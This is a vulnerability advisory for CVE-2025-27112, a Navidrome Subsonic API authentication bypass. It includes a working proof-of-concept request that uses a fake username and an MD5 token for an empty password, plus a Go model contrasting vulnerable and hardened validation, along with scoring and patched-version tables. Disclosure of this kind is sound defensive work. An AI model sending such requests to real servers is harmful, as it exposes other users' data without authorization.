In certain Subsonic API endpoints, authentication can be bypassed by supplying a username that does not exist on the server together with a token computed for an empty password (the MD5 of the client-chosen salt alone). This grants read-only access to the server's resources; write operations fail with a "permission denied" error.
The authentication check does not fail closed when the username is unknown. An attacker can send any arbitrary username that does not exist on the system together with the Subsonic token for an empty password, t = md5("" + s), i.e. the MD5 of the salt s chosen by the client. Under these conditions Navidrome treats the request as authenticated and serves a range of Subsonic endpoints without requiring valid credentials. To reproduce: generate a salt, hash it, and send the salt as s and the hash as t.
```javascript
// Client-side salt generation: any random string works as the Subsonic salt.
const salt = Math.random().toString(36).substring(2, 15); // e.g., salt = "x1vbudn1m6d"
```
```shell
# The Subsonic token is t = md5(password + salt); with an empty password it is md5(salt).
# Using the example salt above
echo -n "x1vbudn1m6d" | md5sum
81f0c0fb5d202ab0d012e6eaeb722d79 -
```
```http
GET https://[host]/rest/getPlaylists?u=FakeUser&t=81f0c0fb5d202ab0d012e6eaeb722d79&s=x1vbudn1m6d&v=1.16.1&c=castafiore&f=json
```
An attacker can use any non-existent username to bypass authentication and read data exposed through the Subsonic API, such as user playlists. Attempts to modify data fail due to insufficient permissions, so the impact is limited to unauthorized disclosure of information.
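The mechanism described above, as an added Go example that is not Navidrome's code: it computes the Subsonic token t = md5(password + s), builds the request from the advisory with an empty password, and runs it against two modelled validators. The "vulnerable" validator assumes the root cause is a user lookup whose not-found error is dropped, so the zero-value user's empty password is used for the token check; that model, the in-memory user store, and the sample credentials are constructed for illustration and are assumptions, not the project's implementation. The hardened validator rejects unknown users before any token math and compares in constant time.

```go
package main

import (
	"crypto/md5"
	"crypto/subtle"
	"encoding/hex"
	"errors"
	"fmt"
	"net/url"
)

// subsonicToken implements the Subsonic API token scheme: t = md5(password + s).
// With an empty password the token collapses to md5(s), which is what the
// advisory's request carries.
func subsonicToken(password, salt string) string {
	sum := md5.Sum([]byte(password + salt))
	return hex.EncodeToString(sum[:])
}

// clientRequest builds the query string shape used in the advisory
// (u, t, s, v, c, f) for a given username, password and salt.
func clientRequest(username, password, salt string) url.Values {
	q := url.Values{}
	q.Set("u", username)
	q.Set("t", subsonicToken(password, salt))
	q.Set("s", salt)
	q.Set("v", "1.16.1")
	q.Set("c", "castafiore")
	q.Set("f", "json")
	return q
}

type user struct {
	Name     string
	Password string
}

// userStore is a constructed stand-in for the server's user datastore
// (username -> password). Plaintext is used only to keep the model short.
type userStore map[string]string

var errNotFound = errors.New("user not found")

func findUser(store userStore, name string) (user, error) {
	pw, ok := store[name]
	if !ok {
		return user{}, errNotFound
	}
	return user{Name: name, Password: pw}, nil
}

// vulnerableCheck models the flaw (assumption, not Navidrome's code): the
// lookup error is ignored, so an unknown username falls through with the
// zero-value user whose Password is "". The client's t then equals
// md5("" + s) and the request is accepted.
func vulnerableCheck(store userStore, q url.Values) bool {
	u, _ := findUser(store, q.Get("u")) // modelled bug: error dropped
	return subsonicToken(u.Password, q.Get("s")) == q.Get("t")
}

// hardenedCheck fails closed: unknown users (and users with an empty
// password) are rejected before any token math, and the comparison is
// constant-time so it does not leak how many bytes matched.
func hardenedCheck(store userStore, q url.Values) bool {
	u, err := findUser(store, q.Get("u"))
	if err != nil || u.Password == "" {
		return false
	}
	expected := subsonicToken(u.Password, q.Get("s"))
	return subtle.ConstantTimeCompare([]byte(expected), []byte(q.Get("t"))) == 1
}

func main() {
	store := userStore{"alice": "correct horse battery"} // constructed sample user

	// The advisory's request: non-existent user, token for an empty password.
	bypass := clientRequest("FakeUser", "", "x1vbudn1m6d")
	fmt.Printf("GET /rest/getPlaylists?%s\n", bypass.Encode())
	fmt.Println("vulnerable check accepts:", vulnerableCheck(store, bypass))
	fmt.Println("hardened check accepts:  ", hardenedCheck(store, bypass))

	// A legitimate client is unaffected by the hardening.
	legit := clientRequest("alice", "correct horse battery", "x1vbudn1m6d")
	fmt.Println("hardened check, valid credentials:", hardenedCheck(store, legit))
}
```

Run as `go run .`; the vulnerable validator prints `true` for the FakeUser request and the hardened one prints `false`, while the legitimate request passes both. The essential property of the fix is the early return on a lookup error: once an unknown user can no longer reach the token comparison, the empty-password token has nothing to match against.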
| EPSS score | EPSS percentile |
|---|---|
| 28.46% | 96.52% |
| Base score | CVSS version | Severity | Vector |
|---|---|---|---|
| 6.9 | 4.0 | Medium | — |
| Type | Value |
|---|---|
| GHSA | GHSA-c3p4-vm8f-386p |
| CVE | CVE-2025-27112 |
| CWE id | Name |
|---|---|
| CWE-287 | Improper Authentication |
Vulnerable version ranges and first patched releases as published by GitHub.
| Ecosystem | Package | Vulnerable range | First patched | Vulnerable functions |
|---|---|---|---|---|
| go | github.com/navidrome/navidrome | >= 0.52.0, < 0.54.5 | 0.54.5 | — |